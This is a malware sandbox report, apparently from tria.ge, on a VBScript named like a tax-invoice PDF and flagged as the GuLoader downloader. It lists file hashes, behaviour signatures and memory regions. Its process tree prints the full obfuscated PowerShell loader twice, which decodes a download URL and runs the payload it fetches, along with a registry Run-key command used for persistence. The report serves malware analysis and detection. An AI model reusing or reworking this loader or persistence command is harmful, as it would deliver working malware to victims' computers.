Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

NTS_eTaxIn...df.vbs

windows7-x64

10

NTS_eTaxIn...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    18/03/2024, 23:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NTS_eTaxInvoice·pdf.vbs

  • Size

    22KB

  • MD5

    44351f5b633f64c785a5cb681f54db24

  • SHA1

    72b14e85f0676ef6829937060fea448753c357b5

  • SHA256

    680acae485ed1f4a3ac87a63eb7b640f15019e6feb43664654c3f6c0ab4cc118

  • SHA512

    a26ff7a5faa522222a551bac2ac973135651aeb81bc4500ee18cab6c6b1f5a65f598bb7b8a8e244e03bdbfd42c34e534e6dd3cb882cf302c7afecd74be430be4

  • SSDEEP

    384:CE686K1TZNiwsye6fUoQvHjNTvDDzgN9g8gT:H686KZHipf6sFxDD3ke8M

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NTS_eTaxInvoice·pdf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Flossflower Circuitman Sawmill Uhaandgribeligheds Topologically #>;$Skatteberegningernes=(cmd /c set /A 115^^0);Function Ditmarskers ([String]$Temperamenters){$Skatteberegningernes=[char][int]$Skatteberegningernes;$Kaklen=$Skatteberegningernes+'ubstring';$Laasningens=8;$Hjemstavnsdigtninger=Agterpartierne($Temperamenters);For($Eskadrechef=7; $Eskadrechef -lt $Hjemstavnsdigtninger; $Eskadrechef+=$Laasningens){$Byplanlggere=$Temperamenters.$Kaklen.Invoke($Eskadrechef, 1);$Fugleungerne=$Fugleungerne+$Byplanlggere;}$Fugleungerne;}function Cacolike ($Industrialismes){. ($Hynes) ($Industrialismes);}function Agterpartierne ([String]$Omniproduction){$Forsorgspdagoger=$Omniproduction.Length-1;$Forsorgspdagoger;}$Osmaterium=Ditmarskers 'OrientaTLandsskr SecablaFrdselsnDescants Brod ef BrahmieNeutr,lr PakninrPotentiiVerandanQuistiogT.eurgi ';$Eftersprgselspressene=Ditmarskers 'DetachehSubcrentBoblekatVar.atipUnsolicsPalfrey:Eu,asia/,agneto/Tr nsfedlatr,birTilbereiMuslimsvMonarcheK.bikme.KampduegSiccatio Stormio Kratogg GroundlKundetje Angios.Col,inscAgitereo CalentmEpiscop/BiankaruYngsteecBestaar? oplukkeInnascixImperiapInfrateoProduktrRadiocht Ritual=PericaedOriginaoTrk.lasw.traamnnHauranilFl,tiero Bofor aUnfratedAdvokat&KonfereiEnregi dKanalfo=Cirkled1BoudoirhJenkrogwCad coum Ancill_,azedlywAge daetrammeprvKokas,ew Om,iviv RapproXSt.gfar2Flgevi.6 Skrige1 ChewelDCh.ngseGCerutte2 TrettePh.pogynwCleidarIDkspladtKalk osdMinat,rGPhrenolSMalax ej.arselsjFolkekiwVo,chsaz GuldbojSoil.re5Rangoonq Mil,trwBegrdel1Ectopis ';$Hynes=Ditmarskers 'GlimtviiR amalgeindsttexLaaarsb ';$Godlessness=Ditmarskers 'Genfrem$MutagengBlousonlBlindbloUdstdnibRea itea Mot,rilLu,tlyo: OphjlpDUdstedegEk.otisnExp,aini BitersnAdmonissSurdimutE,patriiKonsumft RedaktuIntromitOksehudi Te.orioMonoximnForsatteAstenisn.nodise Enevrel=Slankek flyttelSPsychodtC.raguaaScissorrGiftingtExtorte-TankbaaBSki.leri Eigh.vtSquirars MordenTUddeligr Dela ta Ikldennbiggssts Pen.eafInsols.e Knleddr.ronolo Kontra -DiffereSGh,ttoioUniversuRa delir RatebecKukkelueKaktusp unione$Br ggekEDeathlifWringintLam llee D,ellirLutredes Cobhoup Nonmarr Kontrags,rnendsIrr.tioeHa,merel RyokansEcla repUnworthr StyrkeeInsoulisChelseasLobulose Propo,nmoleskieThorax, Regnomr-Vel enoDDrenesveReprivasNotebo.tfodtudsiRioj srnB bliota,ynkrontGoddizeiBefolknoKastebonUbet.de Malinge$reellesBVen,sonlsyvarmeeTerraripSek.erehHanrejeaS andarrLg.andeo Spr utpBilledrhVacoaafrslinkedyEnterodpTruckfrl Extrava uhand,sFeltspetReinocuyMonoeth ';Cacolike (Ditmarskers 'Aflyste$Rekognog BethwilDorsicoo BaghovbPi,kberaMadkasslPseudox:RigiditBTotherhl Amphore DiscolpHoldin hOpbevaraTopsejlr SengeboInds.vnpGakfrash ikaryrT,llidsy VrikkepKurdsrolIstningaSlutopgsSikkerhtIntensiy Pot,oy=Kermess$M.tigsteTrlbindnSt.ldbav Hastem: BrosteaNo,dbrap AnstilpKilolitdW.dowliaFred,gstStudentaNonposs ') ;Cacolike (Ditmarskers 'PolypagITrygonim.ulturhp Male,iocneorumr PindentUdtagel-doriesdMM harshoUdsanerdProto.huFilmcenl CellsteTropikf OillesBReaffiriVuggegatMellemmsDisabi.TFa makorelitekua MatrimnKvllerssS,agterfO.kastnevulvar rPe iton ') ;$Blepharophryplasty=$Blepharophryplasty+'\Effektiviteten.Ele' ;Cacolike (Ditmarskers 'Passi.e$VraltedgOrientelSubclano F.kultbViceforaBidragslCoh.bat:VaesentPUnseculaCalamitnTorvetoe kresteuGenp rtr AnpartoSphacelpKrukkeriFonterms DrmmeukDrmmeageBodonid1Situati1 Ed,mun8 Cathol= Forsb (.urabilTHomogeneMadothesIntermitP,ngepo- Lanya PMilitsea Opsttet EndevahSjoskes Salonf$Ocea.icBUfo,stallapstreeKard,napautocamhA,talenaUnderscr Flotilo ForgrepGenspejhFjernstrMiltoniy DeoxidpUniverslTuredexaLastenssSmaaordtDetermiy midtpa)Byrende ') ;while (-not $Paneuropiske118) {Cacolike (Ditmarskers ' SwigsgIKookrisf.amstem S lgsa(Ophrsud$ KrampeDOffsettgRegasssnOp,eklaiLuksus,nRydningsSpr.deltd rektoi Kirurgt FredchufriskpitNunc esiBearberoEfteraandeltidieP,oppernOndskab.FljdrenJQuartato Ad essbStilhedS,ibliottRes ootaVallisntAnthraceM,derni Astrolo-DreamboeDicrotoqIldsted Riveb $TilsprgOAf isersDa,cysamNonprocaElektritDelen,reOverelar CuticuiCror,spu Amethym,ndhold)cu.toms Forhae {Chinb nSUvrdightSektoreaMahjongrPr secttbr,ndys- dmarchSkolon elSt ftspeOrderlyeBefstn p skjort Indrmme1 Salgsj}Liderlie BesejllFalkejasB,folkeeDdemand{ Z.beleS cubetjtPawns oaKugleflrCy lametGulistl-Angulo,SUnderw l FruggaeUncribgeScytitipSvejtse Samens1Avide,c; IndhftCCusi ejaRamlerec BrnefloRepolymlTuplepriAgendumk Alge.reKabinet .ubven$U,histoGGnomicnoPoniarddDdedagslLsebrile Forsvas contr s SeabagnMikrobiePerikons Charons Umbren} Catama ');Cacolike (Ditmarskers 'Mikk.de$Mi.behag Sko,emlStr kiloMestizobCushatkaTvesprolTegllag:Ca,llekPToem,gla Supernn FremlyeSeamanluRe.torerS.berifoPrecogipreel,cti ExpostsTjenestkFletdokePangram1Tumlepl1Anlgs.d8A timon=Scoterh( umenneTUnprofue Forsk,sUdgiveltPrrnatl-Meste,nPKrmmerhaadsmitht F,dbolh Suvern Endsi.e$a,kiverB paddaklOmstdele burgeepJudaskyhF.rtiliaHeathbrrCoshed oU,stillpYaghourhPallidirMyriadey ,lovsypKru tprlAstrogeaSteatocsDimmingtVsentliy Fdeva )Unlucid ') ;}Cacolike (Ditmarskers '.uggere$Aecial.gSpilledlPrerecoo oetizeb Pa hfiaShorthalCocoroo:AdminisB Lorgneu Beslagl Ethn.llanalyseeMisprodtVoidneslSquaddyeVanligesBu getesVarmetp Precul=Covertl HexastyGsultaneeSteamertBrandd -Em etraCKnewbomoBouillon PrketjtR,valide,lectopnCeylonet.undten tusinde$Spurpr,B BiskoplCatechieUn ervuphabsburhArkitekaSgerumarPsychomoSmrehulpStempe hSphexpor,hynchoy CaquetpEndiviel Stli,sa Cam,ussKlampentToxophoyGrundst ');Cacolike (Ditmarskers 'Guep rd$lughdoag,idwintlLangsomo OpryknbDiplomsaoccipitlPantomi: Tilto,L H.ppigoTounatecTyksakkkP,chyrhoTipb,rtuAf.ranctRegionpe Trow,drLsen es jantedo=Spid.hu Ekspedi[Arb,jdsS ,halasyUgebladsdiskvaltAlkefuge PylredmThanato. S.ibinCBadevano AasyngnModem.ivKleiniteNoncanorPodop.ttSammen,]Mi fors:Cigarha: ivetteFSun.tterSole,ogobanestrmR defogBSvarb ea R.nrins Rekorde Bjergr6ridsenm4Beryll.S Overl,tDestillrTribunei,atoctinSpi,lebg Aalert(Apot op$TranholBAnfgtedu Nonpo,lKomb nelImmunofeDrawboltTheologlRedi,coeAttermis Dignins hakerd) Fe ton ');Cacolike (Ditmarskers 'Preedit$Laoth,lgProofr.lBedriftoProba.ib Tealn.aSerialil nproje:Ud,aevnDEmbarg,yMidshipgBlnd,aatDrengeaiIdtbdragStatussgRekursarPh,tolaewiggismsUndfang Skibs.a= Pr mov Cra.ene[GuldaldSLubespoyLit erasBestyretdesillueStallinmHjlpe.a.DrovybeTRedaktiePostf xxZi.ninvtU.linge. eopoliEUnpraisnO cumencWanyo.ooRegneard Effec.iKlerkennKausalegFr.bble] Bibels:Tylosty:UrohaemAStrafprS pontanCEpigyniILummoxnI Shippa.revieweG Heavy,e SprinttNonapprSHydrofetMosegrur Kard.niUd.ntninMinimumgCoptven(Barende$Dia,ektLHovedsaoTrivalecSi.etbikCrosseroFaguddauChasseutHaandreeSecondirTightro)Blaffed ');Cacolike (Ditmarskers 'Milieut$Sporvogg Turnu.lScleroco NgtendbHudlsttaRecredelFuldkom:AnocathDBurk dsavaabenpdTilriveeClabberlHold.arfOnondagrVarehusiLampro.=Exoenzy$DiscaseD formalyFonduemgBibringtUnvisioi scamlegH.emmesgSaucelerDva,etieVanishes Bo,udd.Ta.insdsSkrmydsuSubspecbFlodbl.sStenhj,tGraabler formbliFlintren FullergRea.ass(Grizela3C,uelti1 Tolkni3 Biogas8Skindbe3canaanp3D.ddles,mortori3.aadfri1Reverse3Klatvis6Gripp e9Undflye)Emfasen ');Cacolike $Dadelfri;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1892
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:452
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Flossflower Circuitman Sawmill Uhaandgribeligheds Topologically #>;$Skatteberegningernes=(cmd /c set /A 115^^0);Function Ditmarskers ([String]$Temperamenters){$Skatteberegningernes=[char][int]$Skatteberegningernes;$Kaklen=$Skatteberegningernes+'ubstring';$Laasningens=8;$Hjemstavnsdigtninger=Agterpartierne($Temperamenters);For($Eskadrechef=7; $Eskadrechef -lt $Hjemstavnsdigtninger; $Eskadrechef+=$Laasningens){$Byplanlggere=$Temperamenters.$Kaklen.Invoke($Eskadrechef, 1);$Fugleungerne=$Fugleungerne+$Byplanlggere;}$Fugleungerne;}function Cacolike ($Industrialismes){. ($Hynes) ($Industrialismes);}function Agterpartierne ([String]$Omniproduction){$Forsorgspdagoger=$Omniproduction.Length-1;$Forsorgspdagoger;}$Osmaterium=Ditmarskers 'OrientaTLandsskr SecablaFrdselsnDescants Brod ef BrahmieNeutr,lr PakninrPotentiiVerandanQuistiogT.eurgi ';$Eftersprgselspressene=Ditmarskers 'DetachehSubcrentBoblekatVar.atipUnsolicsPalfrey:Eu,asia/,agneto/Tr nsfedlatr,birTilbereiMuslimsvMonarcheK.bikme.KampduegSiccatio Stormio Kratogg GroundlKundetje Angios.Col,inscAgitereo CalentmEpiscop/BiankaruYngsteecBestaar? oplukkeInnascixImperiapInfrateoProduktrRadiocht Ritual=PericaedOriginaoTrk.lasw.traamnnHauranilFl,tiero Bofor aUnfratedAdvokat&KonfereiEnregi dKanalfo=Cirkled1BoudoirhJenkrogwCad coum Ancill_,azedlywAge daetrammeprvKokas,ew Om,iviv RapproXSt.gfar2Flgevi.6 Skrige1 ChewelDCh.ngseGCerutte2 TrettePh.pogynwCleidarIDkspladtKalk osdMinat,rGPhrenolSMalax ej.arselsjFolkekiwVo,chsaz GuldbojSoil.re5Rangoonq Mil,trwBegrdel1Ectopis ';$Hynes=Ditmarskers 'GlimtviiR amalgeindsttexLaaarsb ';$Godlessness=Ditmarskers 'Genfrem$MutagengBlousonlBlindbloUdstdnibRea itea Mot,rilLu,tlyo: OphjlpDUdstedegEk.otisnExp,aini BitersnAdmonissSurdimutE,patriiKonsumft RedaktuIntromitOksehudi Te.orioMonoximnForsatteAstenisn.nodise Enevrel=Slankek flyttelSPsychodtC.raguaaScissorrGiftingtExtorte-TankbaaBSki.leri Eigh.vtSquirars MordenTUddeligr Dela ta Ikldennbiggssts Pen.eafInsols.e Knleddr.ronolo Kontra -DiffereSGh,ttoioUniversuRa delir RatebecKukkelueKaktusp unione$Br ggekEDeathlifWringintLam llee D,ellirLutredes Cobhoup Nonmarr Kontrags,rnendsIrr.tioeHa,merel RyokansEcla repUnworthr StyrkeeInsoulisChelseasLobulose Propo,nmoleskieThorax, Regnomr-Vel enoDDrenesveReprivasNotebo.tfodtudsiRioj srnB bliota,ynkrontGoddizeiBefolknoKastebonUbet.de Malinge$reellesBVen,sonlsyvarmeeTerraripSek.erehHanrejeaS andarrLg.andeo Spr utpBilledrhVacoaafrslinkedyEnterodpTruckfrl Extrava uhand,sFeltspetReinocuyMonoeth ';Cacolike (Ditmarskers 'Aflyste$Rekognog BethwilDorsicoo BaghovbPi,kberaMadkasslPseudox:RigiditBTotherhl Amphore DiscolpHoldin hOpbevaraTopsejlr SengeboInds.vnpGakfrash ikaryrT,llidsy VrikkepKurdsrolIstningaSlutopgsSikkerhtIntensiy Pot,oy=Kermess$M.tigsteTrlbindnSt.ldbav Hastem: BrosteaNo,dbrap AnstilpKilolitdW.dowliaFred,gstStudentaNonposs ') ;Cacolike (Ditmarskers 'PolypagITrygonim.ulturhp Male,iocneorumr PindentUdtagel-doriesdMM harshoUdsanerdProto.huFilmcenl CellsteTropikf OillesBReaffiriVuggegatMellemmsDisabi.TFa makorelitekua MatrimnKvllerssS,agterfO.kastnevulvar rPe iton ') ;$Blepharophryplasty=$Blepharophryplasty+'\Effektiviteten.Ele' ;Cacolike (Ditmarskers 'Passi.e$VraltedgOrientelSubclano F.kultbViceforaBidragslCoh.bat:VaesentPUnseculaCalamitnTorvetoe kresteuGenp rtr AnpartoSphacelpKrukkeriFonterms DrmmeukDrmmeageBodonid1Situati1 Ed,mun8 Cathol= Forsb (.urabilTHomogeneMadothesIntermitP,ngepo- Lanya PMilitsea Opsttet EndevahSjoskes Salonf$Ocea.icBUfo,stallapstreeKard,napautocamhA,talenaUnderscr Flotilo ForgrepGenspejhFjernstrMiltoniy DeoxidpUniverslTuredexaLastenssSmaaordtDetermiy midtpa)Byrende ') ;while (-not $Paneuropiske118) {Cacolike (Ditmarskers ' SwigsgIKookrisf.amstem S lgsa(Ophrsud$ KrampeDOffsettgRegasssnOp,eklaiLuksus,nRydningsSpr.deltd rektoi Kirurgt FredchufriskpitNunc esiBearberoEfteraandeltidieP,oppernOndskab.FljdrenJQuartato Ad essbStilhedS,ibliottRes ootaVallisntAnthraceM,derni Astrolo-DreamboeDicrotoqIldsted Riveb $TilsprgOAf isersDa,cysamNonprocaElektritDelen,reOverelar CuticuiCror,spu Amethym,ndhold)cu.toms Forhae {Chinb nSUvrdightSektoreaMahjongrPr secttbr,ndys- dmarchSkolon elSt ftspeOrderlyeBefstn p skjort Indrmme1 Salgsj}Liderlie BesejllFalkejasB,folkeeDdemand{ Z.beleS cubetjtPawns oaKugleflrCy lametGulistl-Angulo,SUnderw l FruggaeUncribgeScytitipSvejtse Samens1Avide,c; IndhftCCusi ejaRamlerec BrnefloRepolymlTuplepriAgendumk Alge.reKabinet .ubven$U,histoGGnomicnoPoniarddDdedagslLsebrile Forsvas contr s SeabagnMikrobiePerikons Charons Umbren} Catama ');Cacolike (Ditmarskers 'Mikk.de$Mi.behag Sko,emlStr kiloMestizobCushatkaTvesprolTegllag:Ca,llekPToem,gla Supernn FremlyeSeamanluRe.torerS.berifoPrecogipreel,cti ExpostsTjenestkFletdokePangram1Tumlepl1Anlgs.d8A timon=Scoterh( umenneTUnprofue Forsk,sUdgiveltPrrnatl-Meste,nPKrmmerhaadsmitht F,dbolh Suvern Endsi.e$a,kiverB paddaklOmstdele burgeepJudaskyhF.rtiliaHeathbrrCoshed oU,stillpYaghourhPallidirMyriadey ,lovsypKru tprlAstrogeaSteatocsDimmingtVsentliy Fdeva )Unlucid ') ;}Cacolike (Ditmarskers '.uggere$Aecial.gSpilledlPrerecoo oetizeb Pa hfiaShorthalCocoroo:AdminisB Lorgneu Beslagl Ethn.llanalyseeMisprodtVoidneslSquaddyeVanligesBu getesVarmetp Precul=Covertl HexastyGsultaneeSteamertBrandd -Em etraCKnewbomoBouillon PrketjtR,valide,lectopnCeylonet.undten tusinde$Spurpr,B BiskoplCatechieUn ervuphabsburhArkitekaSgerumarPsychomoSmrehulpStempe hSphexpor,hynchoy CaquetpEndiviel Stli,sa Cam,ussKlampentToxophoyGrundst ');Cacolike (Ditmarskers 'Guep rd$lughdoag,idwintlLangsomo OpryknbDiplomsaoccipitlPantomi: Tilto,L H.ppigoTounatecTyksakkkP,chyrhoTipb,rtuAf.ranctRegionpe Trow,drLsen es jantedo=Spid.hu Ekspedi[Arb,jdsS ,halasyUgebladsdiskvaltAlkefuge PylredmThanato. S.ibinCBadevano AasyngnModem.ivKleiniteNoncanorPodop.ttSammen,]Mi fors:Cigarha: ivetteFSun.tterSole,ogobanestrmR defogBSvarb ea R.nrins Rekorde Bjergr6ridsenm4Beryll.S Overl,tDestillrTribunei,atoctinSpi,lebg Aalert(Apot op$TranholBAnfgtedu Nonpo,lKomb nelImmunofeDrawboltTheologlRedi,coeAttermis Dignins hakerd) Fe ton ');Cacolike (Ditmarskers 'Preedit$Laoth,lgProofr.lBedriftoProba.ib Tealn.aSerialil nproje:Ud,aevnDEmbarg,yMidshipgBlnd,aatDrengeaiIdtbdragStatussgRekursarPh,tolaewiggismsUndfang Skibs.a= Pr mov Cra.ene[GuldaldSLubespoyLit erasBestyretdesillueStallinmHjlpe.a.DrovybeTRedaktiePostf xxZi.ninvtU.linge. eopoliEUnpraisnO cumencWanyo.ooRegneard Effec.iKlerkennKausalegFr.bble] Bibels:Tylosty:UrohaemAStrafprS pontanCEpigyniILummoxnI Shippa.revieweG Heavy,e SprinttNonapprSHydrofetMosegrur Kard.niUd.ntninMinimumgCoptven(Barende$Dia,ektLHovedsaoTrivalecSi.etbikCrosseroFaguddauChasseutHaandreeSecondirTightro)Blaffed ');Cacolike (Ditmarskers 'Milieut$Sporvogg Turnu.lScleroco NgtendbHudlsttaRecredelFuldkom:AnocathDBurk dsavaabenpdTilriveeClabberlHold.arfOnondagrVarehusiLampro.=Exoenzy$DiscaseD formalyFonduemgBibringtUnvisioi scamlegH.emmesgSaucelerDva,etieVanishes Bo,udd.Ta.insdsSkrmydsuSubspecbFlodbl.sStenhj,tGraabler formbliFlintren FullergRea.ass(Grizela3C,uelti1 Tolkni3 Biogas8Skindbe3canaanp3D.ddles,mortori3.aadfri1Reverse3Klatvis6Gripp e9Undflye)Emfasen ');Cacolike $Dadelfri;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1804
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:844
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:1076
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Overstresses" /t REG_EXPAND_SZ /d "%Desight% -w 1 $Reverseringerne=(Get-ItemProperty -Path 'HKCU:\Cigarilloer\').Skinnelgningen;%Desight% ($Reverseringerne)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3032
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Overstresses" /t REG_EXPAND_SZ /d "%Desight% -w 1 $Reverseringerne=(Get-ItemProperty -Path 'HKCU:\Cigarilloer\').Skinnelgningen;%Desight% ($Reverseringerne)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1500

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        077abdfe0bd9dadd5af04c6c69e82ad1

        SHA1

        bd3c669b6003478b5ca7f467edfe4c0c2c00a9f2

        SHA256

        de58fa6a7bc6185ca67e19543fdc9be24be87d51cd6a63ca3ea810dd1880a9f1

        SHA512

        149c3f8b54f7364d6a66dbefc3492f2515e0c51d4b4c9389dd7fb3bd91e5a85376199748b7e0c25601398d31580fdc2767154a9c1444de4970c8ad6cef362b9b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Cab80C4.tmp
        Filesize

        65KB

        MD5

        ac05d27423a85adc1622c714f2cb6184

        SHA1

        b0fe2b1abddb97837ea0195be70ab2ff14d43198

        SHA256

        c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

        SHA512

        6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Pawkier.txt
        Filesize

        4KB

        MD5

        3d2e24a66a332b35d047e3e68438d566

        SHA1

        bfa3b7030f168fd6d35d524e44a4d8feb4e1d27b

        SHA256

        97708a2b89bfaf8e767951c9fdea2ad49ea2d425627a061e4b9f1d35c41d552e

        SHA512

        6957bbac8ae9320bbb97475d35ad2415efa90ed2a80269544214d40db14ba5f80fcad4d5f947d95d00a991d9720210e7a09c97877030930fc7a0ec92ec67a1ac

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Pawkier.txt
        Filesize

        1KB

        MD5

        0690965a1d4a33144c782a9ab05fbe08

        SHA1

        9ba119f9b54729fc3121a6fa1879a3394abe1685

        SHA256

        9e3c1a73fc70760a59f37bb7261069d3305cd40236097b0bc367fb69dfc9c7e7

        SHA512

        9d84b009b993a3a73dbfcb4ef33fd5d1652597c8cfffbcc7c76021d6ab67fd12085ba0666dbd86afa1e37e64aaa83e93e8edcfc7aa86c071041da9f2f0ba28e8

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Pawkier.txt
        Filesize

        2KB

        MD5

        4c7b68788c70c64d92cf611142c01314

        SHA1

        607a1ed2d60ad40379b282ac5e853a6abf6a30e8

        SHA256

        a4f9fb7774a0c15aa55e545661ee42923c00b7ffc449aea45cba507cc9ae9b9c

        SHA512

        437d3e3790f706d26cd2cabf93dbb4faf8ccef904701c7e200be609eea2716fa83041f6844ed6aef1e852374729a59d86b3d8363d07e4d4e11fdcc5c3e14fdc1

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OUXVZRTXTWSM4LW6IRWO.temp
        Filesize

        7KB

        MD5

        99a555d64b014cdc9cc4ac426c7779c1

        SHA1

        579a42a73e395aeee9a34dcc9b8a7c0a0cf3d558

        SHA256

        822d76bd9494ca0a0bf92c4c1e2ca37a7fb3abc1af55a8bdbc099cc907f30cb3

        SHA512

        7de3391374e8a2996cc9dc32446ec1b5efbc8b2e07e9e5ffd0be6a254b69609bbd5d4a529fd16867c9534b491f2208543f3c20330e299b83fd42808757124f12

        Download Submit

      • memory/1076-325-0x00000000771F0000-0x0000000077399000-memory.dmp

        Filesize

        1.7MB

        Download

      • memory/1076-320-0x0000000001D80000-0x0000000006C80000-memory.dmp

        Filesize

        79.0MB

        Download

      • memory/1076-321-0x00000000773E0000-0x00000000774B6000-memory.dmp

        Filesize

        856KB

        Download

      • memory/1076-299-0x00000000773E0000-0x00000000774B6000-memory.dmp

        Filesize

        856KB

        Download

      • memory/1076-298-0x0000000077416000-0x0000000077417000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1076-297-0x00000000771F0000-0x0000000077399000-memory.dmp

        Filesize

        1.7MB

        Download

      • memory/1804-294-0x00000000771F0000-0x0000000077399000-memory.dmp

        Filesize

        1.7MB

        Download

      • memory/1804-293-0x0000000073230000-0x00000000737DB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1804-273-0x0000000002910000-0x0000000002950000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1804-272-0x0000000073230000-0x00000000737DB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1804-274-0x0000000073230000-0x00000000737DB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1804-275-0x0000000002910000-0x0000000002950000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1804-285-0x0000000002910000-0x0000000002950000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1804-286-0x0000000005770000-0x0000000005771000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1804-287-0x0000000006AF0000-0x000000000B9F0000-memory.dmp

        Filesize

        79.0MB

        Download

      • memory/1804-296-0x00000000773E0000-0x00000000774B6000-memory.dmp

        Filesize

        856KB

        Download

      • memory/1804-295-0x0000000002910000-0x0000000002950000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1892-289-0x0000000002820000-0x00000000028A0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/1892-267-0x0000000002820000-0x00000000028A0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/1892-269-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1892-291-0x0000000002820000-0x00000000028A0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/1892-268-0x0000000002D60000-0x0000000002D72000-memory.dmp

        Filesize

        72KB

        Download

      • memory/1892-292-0x0000000002820000-0x00000000028A0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/1892-288-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1892-290-0x0000000002820000-0x00000000028A0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/1892-266-0x0000000002820000-0x00000000028A0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/1892-265-0x0000000002820000-0x00000000028A0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/1892-263-0x000000001B500000-0x000000001B522000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1892-264-0x0000000002820000-0x00000000028A0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/1892-262-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1892-261-0x00000000028F0000-0x00000000028F8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1892-324-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1892-260-0x000000001B600000-0x000000001B8E2000-memory.dmp

        Filesize

        2.9MB

        Download